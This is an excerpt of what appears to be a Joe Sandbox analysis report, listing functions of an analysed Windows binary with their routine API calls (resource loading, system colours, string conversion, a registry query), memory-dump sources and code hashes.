                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: AppendMenuMessageSend
                                                                              • String ID:
                                                                              • API String ID: 3116418596-0
                                                                              • Opcode ID: 75f867be26010bdae0c289bee38be723af45e4da4e7b2c05dfbbe37a1d4ab1a8
                                                                              • Instruction ID: ce26adb54603f5cb8aa5f1552e738dd29328a24de84fea552442faee091f9313
                                                                              • Opcode Fuzzy Hash: 75f867be26010bdae0c289bee38be723af45e4da4e7b2c05dfbbe37a1d4ab1a8
                                                                              • Instruction Fuzzy Hash: 15418131A006089FDB25EFA4DC42BADB7B4FF04720F148169E91ABB2E1DB756A04CF55
                                                                              Function 00E8691B Relevance: 6.1, APIs: 4, Instructions: 110threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00E86E0E: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00E86931,00000000,000000FF,?), ref: 00E86E2D
                                                                                • Part of subcall function 00E86E0E: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00E86E42
                                                                                • Part of subcall function 00E86E0E: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,00000000,00000000,00000002,?,?,?,?,00E86931,00000000,000000FF,?,?,00E87BA3), ref: 00E86E59
                                                                                • Part of subcall function 00E86E0E: SysFreeString.OLEAUT32(00000000), ref: 00E86E65
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E8695A
                                                                              • GetCurrentThread.KERNEL32 ref: 00E869BA
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00E869C3
                                                                              • GetVersionExA.KERNEL32(?,?,?,?,?,?,?,00E87BA3,?,?,?,?,?,80070057,00000000), ref: 00E86A5F
                                                                                • Part of subcall function 00E990DA: __CxxThrowException@8.LIBVCRUNTIME ref: 00E990EE
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharCurrentMultiStringThreadWide$AllocException@8FreeH_prolog3_ThrowVersion
                                                                              • String ID:
                                                                              • API String ID: 1519344046-0
                                                                              • Opcode ID: 88ba0989edb831e106139cedf91ff0a84f632c96d4d6d6b7cb1087efc5eadc30
                                                                              • Instruction ID: 40ad51246bb2a425909b490e80e798ac81eafc8674e45ccded539c4279050635
                                                                              • Opcode Fuzzy Hash: 88ba0989edb831e106139cedf91ff0a84f632c96d4d6d6b7cb1087efc5eadc30
                                                                              • Instruction Fuzzy Hash: 574113B0900B04CFD721AF6AC981796FBF4BF49314F509A6ED1AEA7651CB70A840CF41
                                                                              Function 00E86020 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindResourceW.KERNEL32(?,49000000,00000006,?,?,?,80004005,8C3A2C7B,?,?,?,00000000,00FF50D8,000000FF,?,00E87632), ref: 00E86038
                                                                              • LoadResource.KERNEL32(?,00000000,?,?,?,?,80004005,8C3A2C7B,?,?,?,00000000,00FF50D8,000000FF,?,00E87632), ref: 00E8604C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoad
                                                                              • String ID:
                                                                              • API String ID: 2619053042-0
                                                                              • Opcode ID: 08bdae5c4e858f7065a96970d0b3d6369988dbdd320877a2bd88af8f8d27b3e8
                                                                              • Instruction ID: 3713116b3b8d3f8ff1f16a9ec58698c071cb5e12a7a6e575c932f0f06d50753e
                                                                              • Opcode Fuzzy Hash: 08bdae5c4e858f7065a96970d0b3d6369988dbdd320877a2bd88af8f8d27b3e8
                                                                              • Instruction Fuzzy Hash: 3A01D637F106256BCB322BA9AC4447AB35CEB8436E7015526FD4DFB201D936EC0047A4
                                                                              Function 00E95972 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00E959A4
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00E959AC
                                                                              • LockResource.KERNEL32(?), ref: 00E959BA
                                                                              • FreeResource.KERNEL32(?), ref: 00E95A13
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindFreeLoadLock
                                                                              • String ID:
                                                                              • API String ID: 1078018258-0
                                                                              • Opcode ID: eef66ebce29d2f3adcf105d730727c786d0d988eb2d73f2b44a5ed819f99bfcc
                                                                              • Instruction ID: 9d96ca659aa26acf0118a1d014dd0f8e32163f1fa41c90250d9751b93a1a438a
                                                                              • Opcode Fuzzy Hash: eef66ebce29d2f3adcf105d730727c786d0d988eb2d73f2b44a5ed819f99bfcc
                                                                              • Instruction Fuzzy Hash: 7D110671900A21EBDF228F95C448BA6B3B4FF45324F14D164E840AB244EB749D40D7A0
                                                                              Function 00E973FE Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003), ref: 00E9745B
                                                                              • VerSetConditionMask.KERNEL32(00000000), ref: 00E97463
                                                                              • VerifyVersionInfoA.KERNEL32(0000009C,00000003,00000000), ref: 00E97474
                                                                              • KiUserCallbackDispatcher.NTDLL(00001000), ref: 00E97485
                                                                                • Part of subcall function 00E97EA2: __EH_prolog3.LIBCMT ref: 00E97EA9
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(00000016), ref: 00E97EB2
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(0000000F), ref: 00E97EC5
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(00000015), ref: 00E97EDC
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(0000000F), ref: 00E97EE8
                                                                                • Part of subcall function 00E97EA2: GetDeviceCaps.GDI32(?,0000000C), ref: 00E97F10
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(0000000F), ref: 00E97F1E
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(00000010), ref: 00E97F2C
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(00000015), ref: 00E97F3A
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(00000016), ref: 00E97F48
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(00000014), ref: 00E97F56
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(00000012), ref: 00E97F64
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(00000011), ref: 00E97F72
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(00000006), ref: 00E97F7D
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(0000000D), ref: 00E97F88
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(0000000E), ref: 00E97F93
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(00000005), ref: 00E97F9E
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(00000008), ref: 00E97FAC
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(00000009), ref: 00E97FB7
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(00000007), ref: 00E97FC2
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(00000002), ref: 00E97FCD
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(00000003), ref: 00E97FD8
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(0000001B), ref: 00E97FE6
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(0000001C), ref: 00E97FF4
                                                                                • Part of subcall function 00E97EA2: GetSysColor.USER32(0000000A), ref: 00E98002
                                                                                • Part of subcall function 00E97968: __EH_prolog3_GS.LIBCMT ref: 00E97972
                                                                                • Part of subcall function 00E97968: GetDeviceCaps.GDI32(?,00000058), ref: 00E97992
                                                                                • Part of subcall function 00E97968: DeleteObject.GDI32(00000000), ref: 00E979FC
                                                                                • Part of subcall function 00E97968: DeleteObject.GDI32(00000000), ref: 00E97A1A
                                                                                • Part of subcall function 00E97968: DeleteObject.GDI32(00000000), ref: 00E97A38
                                                                                • Part of subcall function 00E97968: DeleteObject.GDI32(00000000), ref: 00E97A56
                                                                                • Part of subcall function 00E97968: DeleteObject.GDI32(00000000), ref: 00E97A74
                                                                                • Part of subcall function 00E97968: DeleteObject.GDI32(00000000), ref: 00E97A92
                                                                                • Part of subcall function 00E97968: DeleteObject.GDI32(00000000), ref: 00E97AB0
                                                                                • Part of subcall function 00E97565: GetSystemMetrics.USER32(00000031), ref: 00E97573
                                                                                • Part of subcall function 00E97565: GetSystemMetrics.USER32(00000032), ref: 00E97581
                                                                                • Part of subcall function 00E97565: SetRectEmpty.USER32(?), ref: 00E97594
                                                                                • Part of subcall function 00E97565: EnumDisplayMonitors.USER32(00000000,00000000,00E9737B,?,?,00000000,00E974A6), ref: 00E975A4
                                                                                • Part of subcall function 00E97565: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00E975B3
                                                                                • Part of subcall function 00E97565: SystemParametersInfoA.USER32(00001002,00000000,?,00000000), ref: 00E975E0
                                                                                • Part of subcall function 00E97565: SystemParametersInfoA.USER32(00001012,00000000,?,00000000), ref: 00E975F4
                                                                                • Part of subcall function 00E97565: SystemParametersInfoA.USER32 ref: 00E9761A
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Color$DeleteObject$System$Info$Parameters$CapsConditionDeviceMaskMetrics$CallbackDispatcherDisplayEmptyEnumH_prolog3H_prolog3_MonitorsRectUserVerifyVersion
                                                                              • String ID:
                                                                              • API String ID: 3326357938-0
                                                                              • Opcode ID: 6bf92c3400a64adea690e6122165fa969ec06da9e7af9065833f885f3089e0bf
                                                                              • Instruction ID: 9e01b1ceab491b0d7cfa90e3dcf89a9ea7163f314b227cdc3dad8a9ec7663880
                                                                              • Opcode Fuzzy Hash: 6bf92c3400a64adea690e6122165fa969ec06da9e7af9065833f885f3089e0bf
                                                                              • Instruction Fuzzy Hash: EA1173B0A10318AFDB21AF719D5AFABB7FCEB85704F40445DB186A6281DBB84A048B51
                                                                              Function 00E86E0E Relevance: 6.1, APIs: 4, Instructions: 51memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00E86931,00000000,000000FF,?), ref: 00E86E2D
                                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00E86E42
                                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,00000000,00000000,00000002,?,?,?,?,00E86931,00000000,000000FF,?,?,00E87BA3), ref: 00E86E59
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00E86E65
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiStringWide$AllocFree
                                                                              • String ID:
                                                                              • API String ID: 447844807-0
                                                                              • Opcode ID: 927f3ca47e92f342941f159ec9e084cebe87e1246f821d90b79d817abfac8f7c
                                                                              • Instruction ID: 7c7d935410f94c55b7ba23cb19da6226d87842207a621ad32c07e591b7788ca0
                                                                              • Opcode Fuzzy Hash: 927f3ca47e92f342941f159ec9e084cebe87e1246f821d90b79d817abfac8f7c
                                                                              • Instruction Fuzzy Hash: 4E014F3A201214BFDB226FA5DC88E9B7E7DFB45BA4F114118F50DAA184DA719E00D7A0
                                                                              Function 00EA6A47 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00F3D600: LeaveCriticalSection.KERNEL32(?,?,?,?,?,00F5258E,00000003,?,?,?,00000004,00F53D30,?,?,?,00E81263), ref: 00F3D614
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00EA6A52
                                                                                • Part of subcall function 00FCED47: RaiseException.KERNEL32(?,?,?,?), ref: 00FCEDA7
                                                                              • __EH_prolog3.LIBCMT ref: 00EA6A5F
                                                                                • Part of subcall function 00EA6578: TlsAlloc.KERNEL32(?,00000000,?,?,00EA64C3,00E81D2C,?,00ED9CDE,0105A4C4,00000000,?,?,00000000), ref: 00EA6597
                                                                                • Part of subcall function 00EA6578: InitializeCriticalSection.KERNEL32(?,?,00EA64C3,00E81D2C,?,00ED9CDE,0105A4C4,00000000,?,?,00000000), ref: 00EA65A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AllocExceptionException@8H_prolog3InitializeLeaveRaiseThrow
                                                                              • String ID: Pe
                                                                              • API String ID: 1769093764-3533477303
                                                                              • Opcode ID: 508ca474dc4dd0169069920cf758b9934946f059a83e0fc7dcf7892ae0556e35
                                                                              • Instruction ID: 1ff2125fcfefd607e4dd1bb9d7c2c5e67b3c16456ee029341a434043f48df97b
                                                                              • Opcode Fuzzy Hash: 508ca474dc4dd0169069920cf758b9934946f059a83e0fc7dcf7892ae0556e35
                                                                              • Instruction Fuzzy Hash: F1014074A0021A9BDB25AF74C806B9D37A5AF47754F18A528F950FF2D1EF38ED009B50
                                                                              Function 00E87675 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00E87699
                                                                              • PathFindExtensionA.SHLWAPI(?), ref: 00E876AF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: ExtensionFileFindModuleNamePath
                                                                              • String ID: %Ts%Ts.dll
                                                                              • API String ID: 2295281026-1896370695
                                                                              • Opcode ID: 126e926ed3a1bc91b3cd20939f50cb7e067599f5901f2d31b3cb4b4b746ff7f4
                                                                              • Instruction ID: 016914c25ce99fd0f721765fbe0d703e6aa39aac50cb34c665c767dafe9398ef
                                                                              • Opcode Fuzzy Hash: 126e926ed3a1bc91b3cd20939f50cb7e067599f5901f2d31b3cb4b4b746ff7f4
                                                                              • Instruction Fuzzy Hash: 93F0A471A1011D9FCB12EB68DD46AEF7BFCAB09700F1004A5A549E7140EA76DE04DBA1
                                                                              Function 00E87753 Relevance: 4.6, APIs: 3, Instructions: 70registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNEL32(80000001,01004094,00000000,00000001,00000000), ref: 00E88014
                                                                              • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000004), ref: 00E88035
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00E88079
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3677997916-0
                                                                              • Opcode ID: 6795036598c5f1a2c9fdc2605bfe1cf9efeb92f6a47397f0ee9f1fce4d3b673f
                                                                              • Instruction ID: d6176bf8a77d95aeeae4f55f67faf6d6f37cfff817a19b1f9149bb700ed9d74a
                                                                              • Opcode Fuzzy Hash: 6795036598c5f1a2c9fdc2605bfe1cf9efeb92f6a47397f0ee9f1fce4d3b673f
                                                                              • Instruction Fuzzy Hash: F0217F72A10205FFFF24DB90C945BAAB7B8FB1031AF104558E959B6040D7B9AA48CB50
                                                                              Function 00E9C071 Relevance: 4.5, APIs: 3, Instructions: 46windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(00000030,00000000,00000000,00000000), ref: 00E9BFAA
                                                                              • TranslateMessage.USER32(00000030), ref: 00E9BFC9
                                                                              • DispatchMessageA.USER32(00000030), ref: 00E9BFD0
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Message$CallbackDispatchDispatcherTranslateUser
                                                                              • String ID:
                                                                              • API String ID: 2960505505-0
                                                                              • Opcode ID: 2b77091a2ad5b0c69dd24ef4172653c2dafa2a02e0818305e5e6f1f9b5dc5735
                                                                              • Instruction ID: 417259ab6c26e3841cf6504748b6c3f05638bab69e544bdee50032f2f4b47697
                                                                              • Opcode Fuzzy Hash: 2b77091a2ad5b0c69dd24ef4172653c2dafa2a02e0818305e5e6f1f9b5dc5735
                                                                              • Instruction Fuzzy Hash: 9BF06232715920AF8B236B64BD489BF779DFFC53657166025F801E7604EB28D8438BA2
                                                                              Function 00E95DED Relevance: 4.5, APIs: 3, Instructions: 24COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(?,?,00000005), ref: 00E95E01
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00E95E09
                                                                              • LockResource.KERNEL32(00000000), ref: 00E95E19
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLock
                                                                              • String ID:
                                                                              • API String ID: 2752051264-0
                                                                              • Opcode ID: 7b5102a6bb4392fd415e025d536b766243bdafe21e4201015f6985e8b5b9a005
                                                                              • Instruction ID: 0e99fcdc55f9034124d2457b8bbc49b9a498018c96b4638af5c168e4c97e6667
                                                                              • Opcode Fuzzy Hash: 7b5102a6bb4392fd415e025d536b766243bdafe21e4201015f6985e8b5b9a005
                                                                              • Instruction Fuzzy Hash: 7AE06D39D11E22AFCB235BA4480869E7BE8BF08320F015214F950FB245DF3999004BA5
                                                                              Function 00E83F44 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00E840AA
                                                                                • Part of subcall function 00E858B0: std::_Lockit::_Lockit.LIBCPMT ref: 00E858EA
                                                                                • Part of subcall function 00E858B0: std::_Lockit::_Lockit.LIBCPMT ref: 00E85908
                                                                                • Part of subcall function 00E858B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00E85928
                                                                                • Part of subcall function 00E858B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00E859F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$Exception@8Throw
                                                                              • String ID: ios_base::badbit set
                                                                              • API String ID: 2777619170-3882152299
                                                                              • Opcode ID: 6f72c5f93495890465ca754e7e06cd5ce208c4f5bcbdf5606a02b27b23165baf
                                                                              • Instruction ID: b7b8be31910613314873da8f41f7b9b53ff2bde35727fba24805f6995c9a68a8
